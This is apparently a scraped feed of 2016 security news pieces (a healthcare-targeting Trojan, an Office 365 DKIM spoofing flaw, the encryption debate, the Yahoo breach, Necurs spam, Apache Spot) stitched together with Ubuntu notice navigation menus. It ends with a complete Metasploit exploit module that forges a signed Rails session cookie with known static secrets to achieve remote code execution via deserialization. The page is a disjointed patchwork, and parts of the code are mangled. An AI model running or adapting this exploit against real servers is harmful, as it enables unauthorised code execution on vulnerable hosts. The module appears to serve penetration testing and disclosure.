Devin Roy

A Trojan targeting US healthcare organizations attempts to avoid detection by going to sleep for prolonged periods after initial infection, security researchers warn.

Symantec estimates that thousands of organizations have been hit by the Gatak Trojan since 2012. The malware is programmed to spread aggressively across an organization’s network once it gets a foothold.

The healthcare sector in particular has been disproportionately targeted – of the top 20 most affected organizations with the highest number of infected computers, 40 per cent were in the healthcare sector, Symantec reports.

Selling healthcare records is a growing trade on cybercrime forums. This could explain the attackers’ heavy focus on the healthcare sector.

Gatak reels in victims through websites promising product licensing keys for pirated enterprise software packages (backup, 3D scanning software, etc). These supposed software license key generators (keygens) actually come packed with malicious code.

The software nasty also spreads to a lesser extent using watering hole attacks (where the instigator infects websites that members of the group are known to visit).

The malware creates a backdoor on compromised machines before stealing information. Hackers are known for leveraging the malware to break into machines on associated networks, probably using weak passwords and poor security in file shares and network drives.

“In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan,” Symantec reports. “In the case of Shylock, these appear to be older versions of the threat and might even be 'false flag' infections.

“They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent,” it adds.

The malware downloads instructions from pre-programmed URLs. These instructions are hidden in image files using steganography, a technique for hiding data within image files. ®

Sponsored: Customer Identity and Access Management


The Register - Security

USN-3135-1: GStreamer Good Plugins vulnerability | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

A flaw in Office 365 could have been exploited by attackers to send out malicious emails and make them look as if they were coming from a legitimate microsoft.com address.

The issue was discovered by Utku Sen, a Turkey-based security enthusiast known for releasing an open source ransomware called Hidden Tear for educational purposes.

Sen found the issue while testing the spam filters of email services such as Outlook 365, Gmail and Yandex. During his tests, which he conducted using the Social Engineering Email Sender (SEES) tool, the expert noticed that Yandex identified some of his phishing emails as valid and marked them with a green icon after performing a DomainKeys Identified Mail (DKIM) verification.

It turned out that the emails detected as valid came from a spoofed microsoft.com email address and they were forwarded through Outlook 365 to Yandex. Further analysis showed that Gmail also accepted the fake microsoft.com emails forwarded from Outlook as legitimate.

The method only worked with emails coming from a spoofed microsoft.com address. When other domains were used, the fake emails went straight to the spam folder.

Sen was unable to figure out the cause, but Reddit user “ptmb” said the problem was likely that Outlook was signing redirected messages with its own DKIM key.

“That means that instead of having an email with a proof of identity from the original sender, you received an email with a proof of identity from the ‘redirector’,” ptmb explained. “And because Outlook was blindly signing these messages it was redirecting, if the message had a fake from field saying something(at)microsoft.com, then after Outlook blindly redirected it, it’d have a genuine DKIM signature from Microsoft by coincidence, even though the original email wasn’t from Microsoft at all.”

Sen informed both Microsoft and Yandex about his findings in September. Microsoft confirmed the issue and patched it in late October, and listed the researcher on its acknowledgements page. Yandex removed the green validation icon, but it’s unclear if it was due to the expert’s report.

Related Reading: Email Is Forever - and It's Not Private

Related Reading: Cisco Patches 9 Flaws in Email Security Appliance

Related Reading: Hackers Can Hijack Dell Email Security Appliances

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

Versus16 Silicon Valley should work with the US government in Washington to arrive at a solution that gives law enforcement access to encrypted comms, but that respects individual privacy.

That's according to former White House counterterrorism and cybersecurity official Daniel Rosenthal, who was debating where the issue of encryption should go next.

Nonsense, responded Cindy Cohn of the Electronic Frontier Foundation (EFF), on stage at the Versus conference in San Francisco. If the tech sector offers some form of compromise now, the government will only come asking for more later.

In the week since Donald Trump was elected president, tech companies have reported a 25 per cent spike in people encrypting their communications.

The reason why is not hard to discern: on the campaign trail the Republican nominee repeatedly stated that he would be prepared to use the full power of the federal government to carry out his policy goals, which includes the forced deportation of millions of people, the surveillance of millions of others, and the pursuit of terrorism above all else.

What's more, Trump weighed in on the biggest showdown in the past decade between law enforcement and the tech industry, telling crowds that they should boycott Apple over its refusal to bypass its own security and grant the FBI access to a locked phone that belonged to San Bernardino shooter Syed Farook.

Risk

Both Rosenthal and Cohn acknowledged that the likelihood of the executive branch of the US government pushing for a backdoor into encryption was "significantly greater" under the Trump Administration.

Although both offered some consolation: Rosenthal said there still remained forces within the executive branch that would argue for the value of strong encryption and the importance of privacy; Cohn promises that the EFF will continue to fight – as it has for decades – to prevent government overreach.

But while both agreed in general, Rosenthal and Cohn represented two very different viewpoints, themselves reflecting two very different attitudes on the East and West Coasts of the United States.

Both agreed that the bill put forward by Senators Dianne Feinstein and Richard Burr in April was a horrible piece of legislation (it eventually died, but not without significant effort being made to kill it).

Rosenthal warned, however, that if the tech industry rules out working on ways to open up access to encrypted data, it may find itself left out the conversation when the "inevitable" next terrorist attack hits the United States and the government reacts to it with new laws.

Cohn stuck with well-worn arguments about the mathematics of encryption: weakened encryption is weak for everyone, and a backdoor is a backdoor as much for bad actors as for law enforcement.

She also warned that if the US government pushes a law to undermine encryption, it sends a signal to the rest of the world's governments, and makes it impossible for tech companies to stand up to other, inevitable demands from across the world.

Déjà vu

This is not the first time this debate has played out – for months this year the back-and-forth over encryption turned into fixed positions.

Rosenthal fell back on flattering the West Coast as being "much smarter" and urging tech companies to figure out a way to make breakable encryption possible. In response, Cohn offered the logic of math and argued that everyone has access to prime numbers. She shook her head at the Washington, DC policy process of finding a middle ground between opposing sides: there is no middle ground on encryption – it works or it doesn't.

Fortunately, neither fed into the familiar insults traded between the coasts – but they did reference them: Silicon Valley doesn't care about terrorism; Washington, DC doesn't care about its citizens' privacy.

Rosenthal thinks that Apple should feel an obligation to be a "good citizen"; Cohn notes that law enforcement agencies should be obliged to follow the law and run all requests for information through the legal process – "because companies are not always in the best position to evaluate requests or know if the system is being misused."

In short, despite the best efforts of two very knowledgeable individuals actively looking to find some common ground, nothing new was uncovered.

It's also notable that neither Cohn nor Rosenthal currently possess government or tech industry roles. It is, of course, possible that there are lots of positive conversations going on behind closed doors between DC and Silicon Valley. But it seems unlikely.

What seems even more unlikely is that the conversation will start with the arrival of the Trump Administration. Trump's stated policies are in many ways antithetical to both the politics and the finances of Silicon Valley.

Trouble ahead

When that inevitable next terrorist attack does come, we can expect to see the Apple versus FBI argument return – but this time with much greater odds and carried out in much louder voices. Just as with the election itself, there is increasingly less room for compromise. One side will win, and one side will lose.

Where will it fall? It will come down to Trump and whether he can persuade Congress to enact a new law. The Obama Administration was split on the issue and the President very publicly sat on the fence. That is far less likely to happen with the President-elect.

If there is a large terrorist attack, as Rosenthal noted, the people's concerns about privacy will fall away if they are offered a firm hand and a clearly stated solution.

And while Tim Cook has taken a principled stance on privacy and encryption, and Google and Facebook and many other tech companies have said they support that view – no one has ever said they will ignore the law of the land. ®

Sponsored: Transforming software delivery with DevOps


The Register - Security

USN-3126-2: Linux kernel (OMAP4) vulnerabilities | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

An investigation conducted into the two Yahoo security incidents disclosed recently revealed the existence of a connection and led researchers to believe that the claim of 200 million accounts being stolen in 2012 is likely false.

In early August, a hacker claimed to possess 200 million Yahoo user accounts stolen from the tech giant back in 2012. The hacker, known online as Peace and peace_of_mind, had offered to sell the data for 3 Bitcoin on a marketplace called TheRealDeal, where he had previously sold hundreds of millions of Tumblr, Myspace, VK and LinkedIn accounts.

Then, earlier this month, Yahoo confirmed that attackers, which the company believes were sponsored by a nation state, breached its systems in 2014 and stole at least 500 million user accounts. Yahoo never confirmed the alleged 2012 incident, although some suggested that the company discovered the 2014 breach while investigating those claims.

Security firm InfoArmor launched an investigation and determined that the vast majority of the 200 million credentials were not associated with Yahoo accounts. Experts believe the data likely comes from multiple third-party leaks and that some of the credentials match only because people reuse passwords. It’s worth noting that some people questioned the validity of the 2012 dump ever since samples of the data were made available.

InfoArmor believes Peace faked the data after having a falling-out with tessa88, another hacker who recently offered to sell hundreds of millions of accounts stolen from various services. According to researchers, tessa88 and Peace exchanged stolen information, until the former was called out over fake and low-quality dumps.

However, evidence uncovered by InfoArmor suggests that there is a link between these cybercriminals and the threat actor that carried out the 2014 attack confirmed by Yahoo.

Researchers believe tessa88 is linked to the real Yahoo hackers through an unidentified actor that played the role of a proxy. This proxy allegedly obtained the Yahoo data from professional black hats in Eastern Europe and provided it to various other actors, including cybercriminals and a state-sponsored party that had been interested in exclusive database acquisitions.

Tessa88 had previously received accounts from the proxy and InfoArmor believes tessa88 and Peace expected to get the Yahoo data as well. However, since that did not happen, Peace created a fake dump and claimed it came from a 2012 breach.

According to the security firm, the 500 million accounts were stolen from Yahoo after the compromised database was divided into hundreds of equal parts. The files, which contained data organized alphabetically, were exfiltrated in segments.

InfoArmor said the actual Yahoo dump is still not available on any cybercrime forums. However, the data has been monetized by some cybercriminals and the company believes it might have also been leveraged in attacks targeting U.S. government personnel.

Yahoo breach aftermath

News of the breach has caused serious problems for Yahoo, just as the company’s core business is about to be acquired by Verizon for $ 4.8 billion. Some believe the incident could impact the deal, but Verizon has yet to comment.

Several class actions have been filed against Yahoo by customers, including people who claim to be directly affected by the breach.

Earlier this week, U.S. Senator Patrick Leahy sent a letter to Yahoo CEO Marissa Mayer asking how such a massive breach could go undetected for two years. Senator Mark Warner has asked the Securities and Exchange Commission (SEC) to determine if the company fulfilled obligations to keep the public and investors informed, as required by law.

Mayer reportedly neglected cybersecurity since she took over the company. According to The New York Times, current and former employees said the CEO focused on functionality and design improvements rather than security.

Alex Stamos, who left his CISO position at Yahoo last year to become Facebook’s CSO, was allegedly denied financial resources for proactive security solutions. Mayer is said to have also rejected a proposal to reset all user passwords fearing that the move would result in more users abandoning its services.

Related: Yahoo Pressed to Explain Huge 'State Sponsored' Hack

Related: Russia? China? Who Hacked Yahoo, and Why?

view counter

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

Meet Apache Spot, a new open source project for cybersecurity

The Apache Spot project was announced at Strata+Hadoop World on Wednesday, Sept. 28, 2016.

Credit: Katherine Noyes

Hard on the heels of the discovery of the largest known data breach in history, Cloudera and Intel on Wednesday announced that they've donated a new open source project to the Apache Software Foundation with a focus on using big data analytics and machine learning for cybersecurity.

Originally created by Intel and launched as the Open Network Insight (ONI) project in February, the effort is now called Apache Spot and has been accepted into the ASF Incubator.

[ Also on InfoWorld: 19 open source GitHub projects for security pros. | Discover how to secure your systems with InfoWorld's Security newsletter. ]

"The idea is, let's create a common data model that any application developer can take advantage of to bring new analytic capabilities to bear on cybersecurity problems," Mike Olson, Cloudera co-founder and chief strategy officer, told an audience at the Strata+Hadoop World show in New York. "This is a big deal, and could have a huge impact around the world."

Based on Cloudera's big data platform, Spot taps Apache Hadoop for infinite log management and data storage scale along with Apache Spark for machine learning and near real-time anomaly detection. The software can analyze billions of events in order to detect unknown and insider threats and provide new network visibility.

Essentially, it uses machine learning as a filter to separate bad traffic from benign and to characterize network traffic behavior. It also uses a process including context enrichment, noise filtering, whitelisting and heuristics to produce a shortlist of most likely security threats.

By providing common open data models for network, endpoint, and user, meanwhile, Spot makes it easier to integrate cross-application data for better enterprise visibility and new analytic functionality. Those open data models also make it easier for organizations to share analytics as new threats are discovered.

Other contributors to the project so far include eBay, Webroot, Jask, Cybraics, Cloudwick, and Endgame.

“The open source community is the perfect environment for Apache Spot to take a collective, peer-driven approach to fighting cybercrime,” said Ron Kasabian, vice president and general manager for Intel's Analytics and Artificial Intelligence Solutions Group. “The combined expertise of contributors will help further Apache Spot’s open data model vision and provide the grounds for collaboration on the world’s toughest and constantly evolving challenges in cybersecurity analytics.”

USN-3089-1: Django vulnerability | Ubuntu

Jump to site nav

  • Jump to content
  • Cloud
    • Overview
    • Ubuntu OpenStack
    • Public cloud
    • Cloud tools
    • Cloud management
    • Ecosystem
    • Cloud labs
  • Server
    • Overview
    • Server management
    • Hyperscale
  • Desktop
    • Overview
    • Features
    • For business
    • For developers
    • Take the tour
    • Desktop management
    • Ubuntu Kylin
  • Phone
    • Overview
    • Features
    • Scopes
    • App ecosystem
    • Operators and OEMs
    • Carrier Advisory Group
    • Ubuntu for Android
  • Tablet
    • Design
    • Operators and OEMs
    • App ecosystem
  • TV
    • Overview
    • Experience
    • Industry
    • Contributors
    • Features and specs
    • Commercial info
  • Management
    • Overview
    • Landscape features
    • Working with Landscape
    • Return on investment
    • Compliance
    • Ubuntu Advantage
  • Download
    • Overview
    • Cloud
    • Server
    • Desktop
    • Ubuntu Kylin
    • Alternative downloads


Ubuntu Security Notices

The volume of spam email has increased significantly this year, being comparable to record levels observed in 2010. Researchers from Cisco Talos believe the increase has been driven mainly from increased activity of the Necurs botnet.

Over the past five years, spam volumes have been relatively low compared to 2010, when they reached an all-time high. However, it appears that this lull might have ended this year, as spam is on the rise once again. Citing data from the Composite Block List (CBL), Cisco Talos researchers note that 2016’s spam volumes are nearly as high as they were back in mid-2010.

Furthermore, the overall size of the SpamCop Block List (SCBL) over the past year shows a spike of more than 450,000 IP addresses in August 2016, although the SCBL size was under 200,000 IPs last year, Cisco says.

The surge in spam email volumes this year, researchers explain, can only mean that dedicated botnets have increased their activity. However, anti-spam systems can usually catch spam campaigns fast because botnets are using a non-targeted/shotgun approach. Even so, researchers say, attacks cannot be predicted before they start.

Responsible for this year’s spike in spam campaigns, Cisco says, might be the Necurs botnet, which was associated only several months ago with the Locky ransomware and the Dridex Trojan. When Necurs suffered an outage in June, Locky and Dridex infections came to a relative stop, but the ransomware returned with a vengeance when the botnet was restored three weeks later.

Both Necurs’ outage and the lack of activity behind Dridex and Locky were supposedly connected to the arrests in Russia related to the Lurk Trojan, which Cisco now confirms. Necurs was only one of the major threats to be silenced following said arrests, but its return also marked a major change in behavior, Cisco says.

“And not only had Necurs returned, but it switched from sending largely Russian dating and stock pump-n-dump spam, to sending malicious attachment-based spam. This was the first time we'd seen Necurs send attachments,” the security researchers say.

Also associated with the Lurk gang, the Angler exploit kit disappeared in June, taking EK traffic down along with it, which has determined threat actors to find new means to deliver their malicious payloads, and spam botnets appear to have become their main choice. Although new anti-spam technologies and high-profile takedowns of spam-related botnets have diminished spam volumes over time, it appears that this attack technique is once again popular among cybercriminals.

According to Cisco, Necurs remains a highly active spam botnet mainly because its operators have found an ingenious method to continue using infected hosts for many years. For that, they only send spam from a subset of infected machines, and then stop using these hosts for several weeks, to draw attention away from them and to trick security personnel into believing that the host has been cleaned.

“Many of the host IPs sending Necurs' spam have been infected for more than two years. To help keep the full scope of the botnet hidden, Necurs will only send spam from a subset of its minions. An infected host might be used for two to three days, and then sometimes not again for two to three weeks,” researchers say. “At Talos, we see this pattern over, and over again for many Necurs-affiliated IPs.”

And because spammers have only a small window of opportunity between the start of a campaign until anti-spam systems are deployed, they try to send as much email as possible to ensure that they can successfully land malicious email into their victims' inboxes.

“Unfortunately there is no silver bullet to defending against a spam campaign. Organizations are encouraged to build a layered set of defenses to maximize the chances of detecting and blocking such an attack. Of course, whenever ransomware is involved, offline backups can be critical to an organization's survival. Restoration plans need to be regularly reviewed and tested to ensure no mistakes have been made and that items have not been overlooked. Lastly, reach out to your users and be sure they understand that strange attachments are never to be trusted,” Cisco says.

view counter

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:


SecurityWeek RSS Feed

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

#Helper Classes copy/paste from Rails4
class MessageVerifier

class InvalidSignature < StandardError; end

def initialize(secret, options = )
@secret = secret
@digest = options[:digest] || 'SHA1'
@serializer = options[:serializer] || Marshal
end

def generate(value)
data = ::Base64.strict_encode64(@serializer.dump(value))
"#data--#generate_digest(data)"
end

def generate_digest(data)
require 'openssl' unless defined?(OpenSSL)
OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
end

end

class MessageEncryptor

module NullSerializer #:nodoc:

def self.load(value)
value
end

def self.dump(value)
value
end

end

class InvalidMessage < StandardError; end

OpenSSLCipherError = OpenSSL::Cipher::CipherError

def initialize(secret, *signature_key_or_options)
options = signature_key_or_options.extract_options!
sign_secret = signature_key_or_options.first
@secret = secret
@sign_secret = sign_secret
@cipher = options[:cipher] || 'aes-256-cbc'
@verifier = MessageVerifier.new(@sign_secret || @secret, :serializer => NullSerializer)
# @serializer = options[:serializer] || Marshal
end

def encrypt_and_sign(value)
@verifier.generate(_encrypt(value))
end

def _encrypt(value)
cipher = new_cipher
cipher.encrypt
cipher.key = @secret
# Rely on OpenSSL for the initialization vector
iv = cipher.random_iv
#encrypted_data = cipher.update(@serializer.dump(value))
encrypted_data = cipher.update(value)
encrypted_data << cipher.final
[encrypted_data, iv].map .join("--")
end

def new_cipher
OpenSSL::Cipher::Cipher.new(@cipher)
end

end

class KeyGenerator

def initialize(secret, options = )
@secret = secret
@iterations = options[:iterations] || 2**16
end

def generate_key(salt, key_size=64)
OpenSSL::PKCS5.pbkdf2_hmac_sha1(@secret, salt, @iterations, key_size)
end

end

include Msf::Exploit::Remote::HttpClient

def initialize(info = )
super(update_info(info,
'Name' => 'Metasploit Web UI Static secret_key_base Value',
'Description' => %q{
This module exploits the Web UI for Metasploit Community, Express and
Pro where one of a certain set of Weekly Releases have been applied.
These Weekly Releases introduced a static secret_key_base value.
Knowledge of the static secret_key_base value allows for
deserialization of a crafted Ruby Object, achieving code execution.

This module is based on
exploits/multi/http/rails_secret_deserialization
},
'Author' =>
[
'Justin Steven', # @justinsteven
'joernchen of Phenoelit <joernchen[at]phenoelit.de>' # author of rails_secret_deserialization
],
'License' => MSF_LICENSE,
'References' =>
[
['OVE', '20160904-0002'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401'],
['URL', 'https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md']
],
'DisclosureDate' => 'Sep 15 2016',
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', ] ],
'DefaultTarget' => 0,
'DefaultOptions' =>

'SSL' => true

))

register_options(
[
Opt::RPORT(3790),
OptString.new('TARGETURI', [ true, 'The path to the Metasploit Web UI', "/"]),
], self.class)
end

#
# This stub ensures that the payload runs outside of the Rails process
# Otherwise, the session can be killed on timeout
#
def detached_payload_stub(code)
%Q^
code = '# Rex::Text.encode_base64(code) '.unpack("m0").first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen("ruby", "wb") rescue nil
if inp
inp.write(code)
inp.close
end
else
Kernel.fork do
eval(code)
end
end

^.strip.split(/\n/).map.join("\n")
end

def check_secret(data, digest, secret)
data = Rex::Text.uri_decode(data)
keygen = KeyGenerator.new(secret,:iterations => 1000)
sigkey = keygen.generate_key('signed encrypted cookie')
digest == OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), sigkey, data)
end

def get_secret(data, digest)
secrets = [
['4.12.0_2016061501', 'd25e9ad8c9a1558a6864bc38b1c79eafef479ccee5ad0b4b2ff6a917cd8db4c6b80d1bf1ea960f8ef922ddfebd4525fcff253a18dd78a18275311d45770e5c9103fc7b639ecbd13e9c2dbba3da5c20ef2b5cbea0308acfc29239a135724ddc902ccc6a378b696600a1661ed92666ead9cdbf1b684486f5c5e6b9b13226982dd7'],
['4.12.0_2016062101', '99988ff528cc0e9aa0cc52dc97fe1dd1fcbedb6df6ca71f6f5553994e6294d213fcf533a115da859ca16e9190c53ddd5962ddd171c2e31a168fb8a8f3ef000f1a64b59a4ea3c5ec9961a0db0945cae90a70fd64eb7fb500662fc9e7569c90b20998adeca450362e5ca80d0045b6ae1d54caf4b8e6d89cc4ebef3fd4928625bfc'],
['4.12.0_2016062101', '446db15aeb1b4394575e093e43fae0fc8c4e81d314696ac42599e53a70a5ebe9c234e6fa15540e1fc3ae4e99ad64531ab10c5a4deca10c20ba6ce2ae77f70e7975918fbaaea56ed701213341be929091a570404774fd65a0c68b2e63f456a0140ac919c6ec291a766058f063beeb50cedd666b178bce5a9b7e2f3984e37e8fde'],
['4.12.0_2016081001', '61c64764ca3e28772bddd3b4a666d5a5611a50ceb07e3bd5847926b0423987218cfc81468c84a7737c23c27562cb9bf40bc1519db110bf669987c7bb7fd4e1850f601c2bf170f4b75afabf86d40c428e4d103b2fe6952835521f40b23dbd9c3cac55b543aef2fb222441b3ae29c3abbd59433504198753df0e70dd3927f7105a'],
['4.12.0_2016081201', '23bbd1fdebdc5a27ed2cb2eea6779fdd6b7a1fa5373f5eeb27450765f22d3f744ad76bd7fbf59ed687a1aba481204045259b70b264f4731d124828779c99d47554c0133a537652eba268b231c900727b6602d8e5c6a73fe230a8e286e975f1765c574431171bc2af0c0890988cc11cb4e93d363c5edc15d5a15ec568168daf32'],
['4.12.0_2016083001', '18edd3c0c08da473b0c94f114de417b3cd41dace1dacd67616b864cbe60b6628e8a030e1981cef3eb4b57b0498ad6fb22c24369edc852c5335e27670220ea38f1eecf5c7bb3217472c8df3213bc314af30be33cd6f3944ba524c16cafb19489a95d969ada268df37761c0a2b68c0eeafb1355a58a9a6a89c9296bfd606a79615'],
['unreleased build', 'b4bc1fa288894518088bf70c825e5ce6d5b16bbf20020018272383e09e5677757c6f1cc12eb39421eaf57f81822a434af10971b5762ae64cb1119054078b7201fa6c5e7aacdc00d5837a50b20a049bd502fcf7ed86b360d7c71942b983a547dde26a170bec3f11f42bee6a494dc2c11ae7dbd6d17927349cdcb81f0e9f17d22c']
]
for secret in secrets
return secret if check_secret(data, digest, secret[1])
end
[nil, nil]
end

def build_signed_cookie(secret)
keygen = KeyGenerator.new(secret,:iterations => 1000)
enckey = keygen.generate_key('encrypted cookie')
sigkey = keygen.generate_key('signed encrypted cookie')
crypter = MessageEncryptor.new(enckey, sigkey)

# Embed the payload within detached stub
code =
"eval('" +
Rex::Text.encode_base64(detached_payload_stub(payload.encoded)) +
"'.unpack('m0').first)"

# Embed code within Rails 4 popchain
cookie = "\x04\b" +
"o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b" +
":\[email protected]" +
":\bERB\x07" +
":\[email protected]"+ Marshal.dump(code)[2..-1] +
":\[email protected]"+ "i\x00" +
":\[email protected]:\vresult:" +
"\[email protected]:\x1FActiveSupport::Deprecation\x00"

crypter.encrypt_and_sign(cookie)
end

def check
cookie_name = '_ui_session'

vprint_status("Checking for cookie #cookie_name")
res = send_request_cgi(
'uri' => datastore['TARGETURI'] , 25)

unless res
return Exploit::CheckCode::Unknown # Target didn't respond
end

if res.get_cookies.empty?
return Exploit::CheckCode::Unknown # Target didn't send us any cookies. We can't continue.
end

match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/)

unless match
return Exploit::CheckCode::Unknown # Target didn't send us a session cookie. We can't continue.
end

if match[1] == cookie_name
vprint_status("Found cookie")
else
vprint_status("Adjusting cookie name to #match[1]")
cookie_name = match[1]
end

vprint_status("Searching for proper secret")

(version, secret) = get_secret(match[2], match[3])

if secret
vprint_status("Found secret, detected version #version")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

#
# Send the actual request
#
def exploit
cookie_name = '_ui_session'

print_status("Checking for cookie #cookie_name")

res = send_request_cgi(
'uri' => datastore['TARGETURI'] , 25)

unless res
fail_with(Failure::Unreachable, "Target didn't respond")
end

if res.get_cookies.empty?
fail_with(Failure::UnexpectedReply, "Target didn't send us any cookies. We can't continue.")
end

match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/)

unless match
fail_with(Failure::UnexpectedReply, "Target didn't send us a session cookie. We can't continue.")
end

if match[1] == cookie_name
vprint_status("Found cookie")
else
print_status("Adjusting cookie name to #match[1]")
cookie_name = match[1]
end

print_status("Searching for proper secret")

(version, secret) = get_secret(match[2], match[3])

unless secret
fail_with(Failure::NotVulnerable, "SECRET not found, target not vulnerable?")
end

print_status("Found secret, detected version #version")

cookie = build_signed_cookie(secret)

print_status "Sending cookie #cookie_name"
res = send_request_cgi(
'uri' => datastore['TARGETURI'] ,
}, 25)

handler
end

end


Exploit Files ≈ Packet Storm